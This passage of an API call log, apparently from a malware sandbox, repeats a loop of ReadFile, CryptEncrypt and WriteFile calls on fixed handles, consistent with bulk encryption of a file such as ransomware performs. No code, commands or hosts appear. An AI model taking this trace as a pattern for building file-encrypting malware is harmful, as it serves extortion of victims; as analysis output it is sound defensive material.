Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.146] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.146] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.146] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.146] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.146] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.146] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.146] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.146] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.146] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.146] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.146] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.146] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.146] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.147] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.147] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.147] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.147] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.147] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.147] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.148] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.148] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.148] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.148] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.148] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.148] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.149] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.149] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.149] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.149] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.149] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.149] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.149] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.149] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.149] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.149] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.149] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.149] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.149] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.150] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.150] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.150] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.150] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.150] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.150] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.150] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.150] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.150] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.150] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.150] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.150] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.150] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.150] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.151] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.151] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.151] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.151] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.151] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.151] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.152] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.152] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.152] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.152] CryptEncrypt (in: hKey=0x2fc408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.152] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, 